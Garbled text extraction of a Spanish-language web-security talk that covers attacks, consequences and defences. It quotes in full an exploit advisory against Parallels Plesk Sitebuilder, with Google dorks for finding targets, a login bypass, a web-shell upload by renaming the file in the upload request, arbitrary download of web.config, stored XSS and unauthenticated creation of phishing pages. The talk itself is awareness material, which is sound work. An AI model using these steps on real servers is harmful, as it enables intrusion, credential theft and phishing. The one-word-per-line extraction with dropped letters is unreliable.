Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
NOTA: Durante los prximos minutos voy a ser algo parecido a la chica de la curva
AGENDA
1\\
Presentacin
2\\
Introduccin
a
la
seguridad
WEB
y
ataques
existentes
3\\
Consecuencias.
Ejemplos
prcKcos
4\\
He
sido
atacado.
Ahora
que
hago?
5\\
Herramientas
y
servicios
con
los
que
protegernos
6\\
Algunos
consejos
Kles
7\\
Hablamos?
La respuesta es obvia:
Qu puedo hacer?
h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf
h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf
h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf
h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf
h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf
h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf
h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf
=!
h_p://youtu.be/vn-lU3Zu3dw
h_p://youtu.be/aCacibJa0Ps
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
Title
:
MulKple
VulnerabiliKes
in
Parallels
Plesk
Sitebuilder
#
Author
:
alieye
#
vendor
:
h_p://www.parallels.com/
#
Contact
:
cseye_ut@yahoo.com
#
Risk
:
High
#
Class:
Remote
#
#
Google
Dork:
#
inurl::2006/Sites
ext:aspx
#
inurl::2006
inurl:.ashx?mediaid
#
intext:"
Copyright
2004-2007
SWso{."
ext:aspx
#
inurl:Wizard/HosKngPreview.aspx?SiteID
#
#
Date:
23/07/2014
#
os
:
windows
server
2003
#
poc
video
clip
:
h_p://alieye.persiangig.com/video/plesk.rar/download
#
#
version
:
for
uploading
shell
(Parallels
Plesk
panel
9.5
-
Parallels
Plesk
Sitebuilder
4.5)
Copyright
2004-2010
#
version
:
for
other
bug
(Parallels
Plesk
panel
9.5
-
Parallels
Plesk
Sitebuilder
4.5)
Copyright
2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-bypass
loginpage
(all
version)
h_p://vicKm.com:2006/login.aspx
change
url
path
to
h_p://vicKm.com:2006/wizard
2-uploading
shell
via
Live
HTTP
Headers(Copyright
2004-2010)
Tools
Needed:
Live
HTTP
Headers,
Backdoor
Shell
Step
1:
Locate
upload
form
on
logo
upload
secKon
in
h_p://vicKm.com:2006/Wizard/DesignLayout.aspx
Step
2:
Rename
your
shell
to
shell.asp.gif
and
start
capturing
data
with
Live
HTTP
Headers
Step
3:
Replay
data
with
Live
HTTP
Headers
-
Step
4:
Change
[Content-DisposiKon:
form-data;
name="ctl00$ContentStep$FileUploadLogo";
lename="shell.asp.gif"\r\n]
to
[Content-DisposiKon:
form-data;
name="ctl00$ContentS
$FileUploadLogo";
lename="shell.asp.asp"\r\n]
Step
5:
go
to
shell
path:
h_p://vicKm.com:2006/Sites/GUID
Sitename
created/App_Themes/green/images/shell_asp.asp
3-Arbitrary
File
Download
Vulnerability(all
version)
You
can
download
any
le
from
your
target
h_p://vicKm.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID
Sitename
created&p=lename
example:
h_p://vicKm.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.cong
4-xss(all
version)
you
can
inject
xss
code
in
all
module
of
this
page
h_p://vicKm.com:2006/Wizard/Edit.aspx
goto
this
page
(edit.aspx),
click
on
one
module
(Blog-eShop-Forum-...)
then
goto
"Add
New
Category"
and
insert
xss
code
in
Category
descripKon
and
....
Enjoy
:)
5-not
authenKcaKon
for
making
a
website(all
version)
making
malicious
page
and
phishing
page
with
these
paths
h_p://vicKm.com:2006/Wizard/Pages.aspx
h_p://vicKm.com:2006/Wizard/Edit.aspx
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]
special
members:
ZOD14C
,
4l130h1
,
bully13
,
3.14nnph
,
amir
[#]
Thanks
To
All
cseye
members
and
All
Iranian
Hackers
[#]
website
:
h_p://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]
Spt
Tnx
To
Master
of
Persian
Music:
Hossein
Alizadeh
[#]
Hossein
Alizadeh
website
:
h_p://www.hosseinalizadeh.net/
[#]
download
ney-nava
album
:
h_p://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
h_p://youtu.be/dGLM_xjZZms
h_p://youtu.be/UtU1gGv9xNw
h_p://es.linkedin.com/in/borjalanseros/
@borjalanseros
7\\
Hablamos?